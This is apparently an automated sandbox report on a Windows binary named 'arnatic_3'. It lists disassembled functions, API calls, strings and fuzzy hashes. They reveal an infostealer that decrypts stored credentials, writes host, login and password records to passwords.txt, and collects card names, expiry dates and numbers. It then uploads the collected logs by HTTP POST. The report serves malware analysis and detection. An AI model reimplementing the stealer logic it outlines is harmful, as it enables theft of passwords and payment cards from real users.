UnhandledExceptionFilter.KERNEL32(xI), ref: 0046DD85
GetCurrentProcess.KERNEL32(C0000409), ref: 0046DDA1
TerminateProcess.KERNEL32(00000000), ref: 0046DDA8

Strings

xI, xrefs: 0046DD80

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: xI
API String ID: 2579439406-301309329
Opcode ID: 43314f6d3aca35ad63e7b53582346d52a7be59adfc83c589c5e4dd92238479f8
Instruction ID: c7a9cc317b0f07adc8db5e1ae0188a426a57e7034248e46a286d2fd744030a9b
Opcode Fuzzy Hash: 43314f6d3aca35ad63e7b53582346d52a7be59adfc83c589c5e4dd92238479f8
Instruction Fuzzy Hash: D921D2B4900204EFE700DF66ED856447BA0FB68715F50447BE90A87771E7B56A81CF0E

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9C8, Relevance: 7.6, APIs: 5, Instructions: 98stringencryptionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040EA08
CryptStringToBinaryA.CRYPT32(?,?,00000001,?,?,00000000,00000000), ref: 0040EA2C
_memmove.LIBCMT ref: 0040EA86
lstrcatA.KERNEL32(004866C4,004866C4), ref: 0040EA9C
lstrcatA.KERNEL32(004866C4,004866C4), ref: 0040EAAE

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptString_memmove_memset
String ID:
API String ID: 3096129145-0
Opcode ID: 4e3799cf60804f2797d4b13e3de56c0edece0394913c75e71dd6f747f193b001
Instruction ID: 74b60738bc3cc92c7ed3ba69765d1f5c7103d62586bb06459ddf717623068289
Opcode Fuzzy Hash: 4e3799cf60804f2797d4b13e3de56c0edece0394913c75e71dd6f747f193b001
Instruction Fuzzy Hash: 16312F71900219AFDB10DFA5DC889EE7BB9FF19344F04043AF509E7241EB345905CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECDA, Relevance: 7.6, APIs: 5, Instructions: 50encryptionCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040ECE7

Part of subcall function 0046948E: __FF_MSGBANNER.LIBCMT ref: 004694A7
Part of subcall function 0046948E: __NMSG_WRITE.LIBCMT ref: 004694AE
Part of subcall function 0046948E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00467630,00000001,00000000,?,?,?,0046768E,00402DA3), ref: 004694D3

_memmove.LIBCMT ref: 0040ECF2
_malloc.LIBCMT ref: 0040ECFE
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040ED17
_memmove.LIBCMT ref: 0040ED2D

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _malloc_memmove$AllocateCryptDataHeapUnprotect
String ID:
API String ID: 2315474888-0
Opcode ID: 36b380847c27e7b94558d29da7e9b724dd9fa457d8703f736cc42990b2c9c491
Instruction ID: ecd96ec42eccfe2b7ec3804df1ec9926ef159170f40d9a87456d616eeebd65f4
Opcode Fuzzy Hash: 36b380847c27e7b94558d29da7e9b724dd9fa457d8703f736cc42990b2c9c491
Instruction Fuzzy Hash: CFF081779041157B8B11AAEA8C45CEF7B7CDD81614B04087BF501A3241E6799A1187BA

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB60, Relevance: 6.0, APIs: 4, Instructions: 48encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040EB80
LocalAlloc.KERNEL32(00000040,?), ref: 0040EB8E
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040EBA4
LocalFree.KERNEL32(?), ref: 0040EBB3

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: ba2fd9fc75d61570d03fead47c776ccc8f2477d1c7571f4d301cb85602a3b09f
Instruction ID: a8d6f2516ef92208e2a9b4e26d7e491949f16a3813d111702824175ebfee7732
Opcode Fuzzy Hash: ba2fd9fc75d61570d03fead47c776ccc8f2477d1c7571f4d301cb85602a3b09f
Instruction Fuzzy Hash: 1301EC70101224FFDB219F56DC8CE8B7FB8EF4ABA1B100466F909A6250D6B19A50DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBC3, Relevance: 6.0, APIs: 4, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040EBE6
LocalAlloc.KERNEL32(00000040,?), ref: 0040EBFE
_memmove.LIBCMT ref: 0040EC13
LocalFree.KERNEL32(?), ref: 0040EC1F

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect_memmove
String ID:
API String ID: 3008826695-0
Opcode ID: 65c5e193b5086873c59879c4d2a1e934a9f128a5af74fb74a1699ff4c18b47f8
Instruction ID: 831a7e6fd7175553f806ac72a807e54ec541f84407d51c0c41852a983b5bd860
Opcode Fuzzy Hash: 65c5e193b5086873c59879c4d2a1e934a9f128a5af74fb74a1699ff4c18b47f8
Instruction Fuzzy Hash: 02014F76900218AFCB00DFE9DC4989EBBB9EB48600B144866F901E7210E6769A508B54

Uniqueness

Uniqueness Score: -1.00%

Function 00442470, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 468COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004425A1
_memset.LIBCMT ref: 00442739

Strings

:memory:, xrefs: 004424BB

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _memmove_memset
String ID: :memory:
API String ID: 3555123492-2920599690
Opcode ID: d4ac0b17e421b39d825402a29e071bf69a2657fd97d2b7898abdda34fae49b8f
Instruction ID: 1a4f5951c2cf26667e8a31f68593f94fe5d4ada52ceaa3f8c7b9ce833cab82aa
Opcode Fuzzy Hash: d4ac0b17e421b39d825402a29e071bf69a2657fd97d2b7898abdda34fae49b8f
Instruction Fuzzy Hash: 2802B970A00205DFEB25DF64CA416AEBBF1BF44314F64416FF855AB292D7B8D980CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction ID: e062db63554d41186879899b2a29d86d0d446b4106035f511935d59846ebc158
Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction Fuzzy Hash: FEB092606124C04BEB2283248419B0276E1A740B06F8984E0A04582D92C66C8A84A104

Uniqueness

Uniqueness Score: -1.00%

Function 004125B7, Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 257filestringCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004125D6
GetCurrentDirectoryA.KERNEL32(00000104,?,00000020), ref: 00412605
lstrcatA.KERNEL32(?,\temp), ref: 00412614
CopyFileA.KERNEL32(?,?,00000001), ref: 00412621
DeleteFileA.KERNEL32(?), ref: 0041288F

Part of subcall function 004695DE: __fsopen.LIBCMT ref: 004695EB

Part of subcall function 0041246C: __EH_prolog3_GS.LIBCMT ref: 00412473
Part of subcall function 0041246C: _memset.LIBCMT ref: 004124CE
Part of subcall function 0041246C: LocalAlloc.KERNEL32 ref: 00412509

_fprintf.LIBCMT ref: 00412717
_fprintf.LIBCMT ref: 00412725
_fprintf.LIBCMT ref: 0041272C
_fprintf.LIBCMT ref: 0041273A
_fprintf.LIBCMT ref: 00412741
_fprintf.LIBCMT ref: 0041274F
_fprintf.LIBCMT ref: 00412756
_fprintf.LIBCMT ref: 00412799
_fprintf.LIBCMT ref: 004127AB
_fprintf.LIBCMT ref: 004127B9

Part of subcall function 0046834C: __lock_file.LIBCMT ref: 00468393
Part of subcall function 0046834C: __stbuf.LIBCMT ref: 00468417
Part of subcall function 0046834C: __output_l.LIBCMT ref: 00468427
Part of subcall function 0046834C: __ftbuf.LIBCMT ref: 00468431

_fprintf.LIBCMT ref: 004127C0
_fprintf.LIBCMT ref: 004127CE
_fprintf.LIBCMT ref: 004127D5
_fprintf.LIBCMT ref: 004127E3
_fprintf.LIBCMT ref: 004127EA
_fprintf.LIBCMT ref: 0041282D
_fprintf.LIBCMT ref: 00412847

Strings

Host: %s, xrefs: 00412734, 004127C8
Password: %s, xrefs: 00412793, 00412827
Login: %s, xrefs: 00412749, 004127DD
\temp, xrefs: 0041260B
Soft: %s, xrefs: 0041271F, 004127B3

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _fprintf$File$AllocCopyCurrentDeleteDirectoryH_prolog3H_prolog3_Local__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcat
String ID: Host: %s$Login: %s$Password: %s$Soft: %s$\temp
API String ID: 742969294-2676079308
Opcode ID: 91584799f08e57f0fa02cca114ca3624b761d47eaee085b26973c0fd9a230e03
Instruction ID: 6ad4b9aa686982e7d097812b41c7e980f5644cd25e12468f358a39a62a7418ef
Opcode Fuzzy Hash: 91584799f08e57f0fa02cca114ca3624b761d47eaee085b26973c0fd9a230e03
Instruction Fuzzy Hash: BF818072900218AEDF01BBA1DC02EEF7768EF04714F50052FF901B6292EF7999958B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E484, Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 277networkCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040E4A3
__cftof.LIBCMT ref: 0040E565
InternetOpenA.WININET(0000002F,00000000,?,00000000,00000000), ref: 0040E580
InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 0040E5A3
InternetConnectA.WININET(00000000,00000000,00000050,?,?,00000003,00000000,00000001), ref: 0040E5C4
InternetSetOptionA.WININET(00000000,00000041,00000001,00000000), ref: 0040E5DD
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00400000,00000001), ref: 0040E600
HttpAddRequestHeadersA.WININET(00000000,?,?,20000000), ref: 0040E65A
__itow_s.LIBCMT ref: 0040E66E
HttpAddRequestHeadersA.WININET(00000000,?,?,20000000), ref: 0040E6BD
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 0040E6CB
HttpQueryInfoA.WININET(00000000,0000002E,?,00000010,00000000), ref: 0040E6E8
InternetCloseHandle.WININET(00000000), ref: 0040E6F3
__cftof.LIBCMT ref: 0040E71F

Part of subcall function 004690FA: __mbsnbcpy_s_l.LIBCMT ref: 0046910D

InternetOpenUrlA.WININET(00000010,00000000,00000000,00000000,00400000,00000000), ref: 0040E733
InternetCloseHandle.WININET(00000000), ref: 0040E748
InternetCloseHandle.WININET(?), ref: 0040E760
InternetCloseHandle.WININET(00000010), ref: 0040E769

Part of subcall function 0040DDD6: __EH_prolog3.LIBCMT ref: 0040DDF5
Part of subcall function 0040DDD6: InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 0040DE2F
Part of subcall function 0040DDD6: InternetReadFile.WININET(00000010,?,000003E8,?), ref: 0040DE49
Part of subcall function 0040DDD6: _memmove.LIBCMT ref: 0040DE7E
Part of subcall function 0040DDD6: _memset.LIBCMT ref: 0040DEAF
Part of subcall function 0040DDD6: HttpQueryInfoA.WININET(00000010,0000001D,?,?,00000000), ref: 0040DEC5

Strings

http, xrefs: 0040E703
Content-Length: , xrefs: 0040E678
POST, xrefs: 0040E5FA
http://, xrefs: 0040E503
Content-Type: multipart/form-data; boundary=, xrefs: 0040E61A
--, xrefs: 0040E4E0

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Internet$Http$CloseHandleRequest$Open$FileH_prolog3HeadersInfoOptionQuery__cftof$ConnectPointerReadSend__itow_s__mbsnbcpy_s_l_memmove_memset
String ID: --$Content-Length: $Content-Type: multipart/form-data; boundary=$POST$http$http://
API String ID: 3912242280-1095625359
Opcode ID: c2c709336668d8979c5bf41e60f12e7b88707728b630d40d185a6c277fffe8d3
Instruction ID: 2369133a5b0709020d36bd477738cbf23b568218996180514e2102354039deab
Opcode Fuzzy Hash: c2c709336668d8979c5bf41e60f12e7b88707728b630d40d185a6c277fffe8d3
Instruction Fuzzy Hash: C9A16171500208BFEB11EF95CC85EEE77ACEB54704F40483EFA02A71D1DBB99A458B69

Uniqueness

Uniqueness Score: -1.00%

Function 00470454, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0046B68A), ref: 0047045C
__mtterm.LIBCMT ref: 00470468

Part of subcall function 00470133: DecodePointer.KERNEL32(00000007,004705CA,?,0046B68A), ref: 00470144
Part of subcall function 00470133: TlsFree.KERNEL32(00000027,004705CA,?,0046B68A), ref: 0047015E
Part of subcall function 00470133: DeleteCriticalSection.KERNEL32(00000000,00000000,7763F3A0,?,004705CA,?,0046B68A), ref: 004728E6
Part of subcall function 00470133: _free.LIBCMT ref: 004728E9
Part of subcall function 00470133: DeleteCriticalSection.KERNEL32(00000027,7763F3A0,?,004705CA,?,0046B68A), ref: 00472910

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0047047E
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0047048B
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00470498
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004704A5
TlsAlloc.KERNEL32(?,0046B68A), ref: 004704F5
TlsSetValue.KERNEL32(00000000,?,0046B68A), ref: 00470510
__init_pointers.LIBCMT ref: 0047051A
EncodePointer.KERNEL32(?,0046B68A), ref: 0047052B
EncodePointer.KERNEL32(?,0046B68A), ref: 00470538
EncodePointer.KERNEL32(?,0046B68A), ref: 00470545
EncodePointer.KERNEL32(?,0046B68A), ref: 00470552
DecodePointer.KERNEL32(Function_000702B7,?,0046B68A), ref: 00470573
__calloc_crt.LIBCMT ref: 00470588
DecodePointer.KERNEL32(00000000,?,0046B68A), ref: 004705A2
GetCurrentThreadId.KERNEL32 ref: 004705B4

Strings

FlsGetValue, xrefs: 00470480
FlsSetValue, xrefs: 0047048D
KERNEL32.DLL, xrefs: 00470457
FlsFree, xrefs: 0047049A
FlsAlloc, xrefs: 00470478

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 5fe8b43cce9107989ede297fc67c2c278c9e1c5183d45e105eeabde4fcece5d7
Instruction ID: ba34e886e53f71596f011c1cfc75165617c85d402fde81922897f726faf983ee
Opcode Fuzzy Hash: 5fe8b43cce9107989ede297fc67c2c278c9e1c5183d45e105eeabde4fcece5d7
Instruction Fuzzy Hash: 3A315E31942312EADB11EF76EC0C69A3EA4EB657607144A3FF418922B0FB788540CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 00412188, Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 245libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 004121B9
GetProcAddress.KERNEL32(00000000), ref: 004121DA
GetProcAddress.KERNEL32(00000000), ref: 004121E8
GetProcAddress.KERNEL32(00000000), ref: 004121F6
GetProcAddress.KERNEL32(00000000), ref: 00412204
GetProcAddress.KERNEL32(00000000), ref: 00412212
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000,00000001,00000000,passwords.txt), ref: 00412321
_fprintf.LIBCMT ref: 00412332
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041234F
_fprintf.LIBCMT ref: 0041235D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041237D
_fprintf.LIBCMT ref: 0041238E
_fprintf.LIBCMT ref: 004123BF
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 004123E0
_fprintf.LIBCMT ref: 004123F1
FreeLibrary.KERNEL32(00000000), ref: 0041244F

Strings

Password: %s, xrefs: 004123E9
Soft: %s, xrefs: 0041232A
Host: %s, xrefs: 00412355
passwords.txt, xrefs: 00412297
Password: , xrefs: 004123B7
Login: %s, xrefs: 00412386

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: AddressProc_fprintf$ByteCharMultiWide$Library$FreeLoad
String ID: Host: %s$Login: %s$Password: $Password: %s$Soft: %s$passwords.txt
API String ID: 1561987134-3130916318
Opcode ID: 5bb80ef01620e792a7617cafe2aa2a6fc92fee57130ec3c75ce96cfd6347511d
Instruction ID: ee8f099f3c3b716a441b55662aedaa9fef94830ceb09cc86d8f5659d99051610
Opcode Fuzzy Hash: 5bb80ef01620e792a7617cafe2aa2a6fc92fee57130ec3c75ce96cfd6347511d
Instruction Fuzzy Hash: 9C8128B2D00208AFDB11DFA6ED85DAEBBB9FB08314B14013EE815E72A1D7359954CF19

Uniqueness

Uniqueness Score: -1.00%

Function 00412B6E, Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 173filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00412BC0
lstrcatA.KERNEL32(?,\temp), ref: 00412BD2
CopyFileA.KERNEL32(?,?,00000001), ref: 00412BE2
_memset.LIBCMT ref: 00412BEF
_sprintf.LIBCMT ref: 00412C01
DeleteFileA.KERNEL32(?), ref: 00412D70

Part of subcall function 004695DE: __fsopen.LIBCMT ref: 004695EB

_fprintf.LIBCMT ref: 00412CA3
_fprintf.LIBCMT ref: 00412CAA

Part of subcall function 0046834C: __lock_file.LIBCMT ref: 00468393
Part of subcall function 0046834C: __stbuf.LIBCMT ref: 00468417
Part of subcall function 0046834C: __output_l.LIBCMT ref: 00468427
Part of subcall function 0046834C: __ftbuf.LIBCMT ref: 00468431

_fprintf.LIBCMT ref: 00412CB6
_fprintf.LIBCMT ref: 00412CBD
_fprintf.LIBCMT ref: 00412CCE
_fprintf.LIBCMT ref: 00412CD5

Part of subcall function 0041246C: __EH_prolog3_GS.LIBCMT ref: 00412473
Part of subcall function 0041246C: _memset.LIBCMT ref: 004124CE
Part of subcall function 0041246C: LocalAlloc.KERNEL32 ref: 00412509

_fprintf.LIBCMT ref: 00412D19

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

_fprintf.LIBCMT ref: 00412D35

Strings

Card: %s, xrefs: 00412D0D
Year: %s, xrefs: 00412CC8
Month: %s, xrefs: 00412CB0
Name: %s, xrefs: 00412C9A
CC\%s_%s.txt, xrefs: 00412BFB
\temp, xrefs: 00412BC6

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _fprintf$File_memset$AllocCopyCurrentDeleteDirectoryH_prolog3_Local__fsopen__ftbuf__lock_file__output_l__stbuf_memmove_sprintflstrcat
String ID: CC\%s_%s.txt$Card: %s$Month: %s$Name: %s$Year: %s$\temp
API String ID: 3490499488-3508537252
Opcode ID: d3102aea371f2c430b95ac543ced5e42955f2b8f2e4a42e208232d3bbfb442c2
Instruction ID: 4875a954737375fedef97ccd9cb32fac6791d0d96f537ed43a368e0435cd661b
Opcode Fuzzy Hash: d3102aea371f2c430b95ac543ced5e42955f2b8f2e4a42e208232d3bbfb442c2
Instruction Fuzzy Hash: 79518F72900218AADF21ABA1DC42FDE777CAF04708F20042FF904B7192EF799A558B59

Uniqueness

Uniqueness Score: -1.00%

Function 00428C52, Relevance: 33.7, APIs: 7, Strings: 12, Instructions: 497COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00428D2D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00428D67
_strncmp.LIBCMT ref: 00428FF2
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00429091
__allrem.LIBCMT ref: 0042909C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042910B

Part of subcall function 00428B07: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00428BAB
Part of subcall function 00428B07: __localtime64_s.LIBCMT ref: 00428BCE

Strings

year, xrefs: 00428F2C, 004291E8
minute, xrefs: 00428E78
hour, xrefs: 00428E51
localtime, xrefs: 00428FA2
second, xrefs: 00428E94
utc, xrefs: 00429132
day, xrefs: 00428E29, 0042920E
month, xrefs: 00428EB5, 004291C4
unixepoch, xrefs: 004290E0
start of , xrefs: 0042919C
weekday , xrefs: 00428FEC
-, xrefs: 00428D7F

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem__localtime64_s_memset_strncmp
String ID: -$day$hour$localtime$minute$month$second$start of $unixepoch$utc$weekday $year
API String ID: 3149664924-3507268942
Opcode ID: 4c1b5fbcb211d367ebe9be6a812718ab5c0bd1a68efcb76493ef8cc908f1f587
Instruction ID: dd153417fef250560900375ff473e8e5e35b412afd360241922f0c2f3d4d0eea
Opcode Fuzzy Hash: 4c1b5fbcb211d367ebe9be6a812718ab5c0bd1a68efcb76493ef8cc908f1f587
Instruction Fuzzy Hash: 18020472E01218DBDF149F65E8407ED7BB5AF54324F6944AFE404AB286EB388C41C76D

Uniqueness

Uniqueness Score: -1.00%

Function 004128B8, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 228stringfileCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041290A
lstrcatA.KERNEL32(?,\temp), ref: 0041291F
CopyFileA.KERNEL32(?,?,00000001), ref: 00412928
_memset.LIBCMT ref: 00412938
lstrcatA.KERNEL32(?), ref: 0041294D
lstrcatA.KERNEL32(?,004867F4), ref: 0041295B
lstrcatA.KERNEL32(?,?), ref: 00412967
lstrcatA.KERNEL32(?,004889FC), ref: 00412975
lstrcatA.KERNEL32(?,?), ref: 00412981
lstrcatA.KERNEL32(?,.txt), ref: 0041298F
DeleteFileA.KERNEL32(?), ref: 00412B50

Part of subcall function 004695DE: __fsopen.LIBCMT ref: 004695EB

lstrcatA.KERNEL32(?), ref: 00412A6E
lstrcatA.KERNEL32(?), ref: 00412A98
lstrcatA.KERNEL32(?,004886F4), ref: 00412AAD
_fprintf.LIBCMT ref: 00412AFC
_fprintf.LIBCMT ref: 00412B18

Strings

.txt, xrefs: 00412983
\temp, xrefs: 00412916
%s%s%s%s%s%s%s, xrefs: 00412AF4

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memset
String ID: %s%s%s%s%s%s%s$.txt$\temp
API String ID: 1987428508-1558371589
Opcode ID: 68ccb811f77613e7c6690cc3feb9a3e651723d623ea4223275231901affd9cdf
Instruction ID: a77ad944357f059a1e5bf719b0ea371f8ef699ee15c742bc335d76f105fbf611
Opcode Fuzzy Hash: 68ccb811f77613e7c6690cc3feb9a3e651723d623ea4223275231901affd9cdf
Instruction Fuzzy Hash: 8C717D72D00248ABEF21AFE5DC41EDE7BB9EF04314F10042AF508FB191EB799A559B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E22F, Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 196fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040E236
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000006C,0040C825,logs,?,00000001,?,00000001), ref: 0040E259
GetFileSize.KERNEL32(00000000,00000000,?,00000001), ref: 0040E26D
CloseHandle.KERNEL32(?,?,00000001), ref: 0040E27E

Strings

png, xrefs: 0040E34C
image/gif, xrefs: 0040E345
image/jpeg, xrefs: 0040E32B
"; filename=", xrefs: 0040E3BD
gif, xrefs: 0040E332
tiff, xrefs: 0040E366
., xrefs: 0040E2F7
", xrefs: 0040E3DD
Content-Type: , xrefs: 0040E3E9
jpg, xrefs: 0040E311
Content-Disposition: form-data; name=", xrefs: 0040E3A7
image/tiff, xrefs: 0040E376
image/png, xrefs: 0040E35F

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: File$CloseCreateH_prolog3_HandleSize
String ID: "$"; filename="$.$Content-Disposition: form-data; name="$Content-Type: $gif$image/gif$image/jpeg$image/png$image/tiff$jpg$png$tiff
API String ID: 3151384386-4065671631
Opcode ID: 9e4f94af6f663527797c9bdf1d2662e81d75bfcdc212c826139c80141fa850ea
Instruction ID: 4a7e2be616a67bae7436cf86dcab6acad74ea79c9c15bdad6a992e3aa8f0af99
Opcode Fuzzy Hash: 9e4f94af6f663527797c9bdf1d2662e81d75bfcdc212c826139c80141fa850ea
Instruction Fuzzy Hash: C9617331E04208AEDB11EBE5C851EEEB7B8AF54B04F10452FF502B71C2DB785A4ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 00414DA3, Relevance: 31.9, APIs: 8, Strings: 10, Instructions: 426fileCOMMON

Download Yara Rule

APIs

__wgetenv.LIBCMT ref: 00414DA8

Part of subcall function 00404C99: __EH_prolog3.LIBCMT ref: 00404CA0

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Part of subcall function 0041473F: __EH_prolog3_catch_GS.LIBCMT ref: 00414749

__wgetenv.LIBCMT ref: 00414E4D

Part of subcall function 00468D3A: _strnlen.LIBCMT ref: 00468D6F
Part of subcall function 00468D3A: __lock.LIBCMT ref: 00468D80
Part of subcall function 00468D3A: __getenv_helper_nolock.LIBCMT ref: 00468D8D

__wgetenv.LIBCMT ref: 00414F01

Part of subcall function 0041473F: _fprintf.LIBCMT ref: 00414A2A
Part of subcall function 0041473F: _fprintf.LIBCMT ref: 00414A3A
Part of subcall function 0041473F: _fprintf.LIBCMT ref: 00414B3F
Part of subcall function 0041473F: _fprintf.LIBCMT ref: 00414B52
Part of subcall function 0041473F: _fprintf.LIBCMT ref: 00414B75
Part of subcall function 0041473F: _fprintf.LIBCMT ref: 00414B86
Part of subcall function 0041473F: _fprintf.LIBCMT ref: 00414BAA
Part of subcall function 0041473F: _fprintf.LIBCMT ref: 00414BB6

Part of subcall function 0040F967: OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?,0049B0CC,00000000,?,00414FBC), ref: 0040F98C
Part of subcall function 0040F967: TerminateProcess.KERNEL32(00000000,00000000,?,?,?,0049B0CC,00000000,?,00414FBC), ref: 0040F99C
Part of subcall function 0040F967: CloseHandle.KERNEL32(00000000,?,?,?,0049B0CC,00000000,?,00414FBC), ref: 0040F9A3
Part of subcall function 0040F967: _free.LIBCMT ref: 0040F9B1

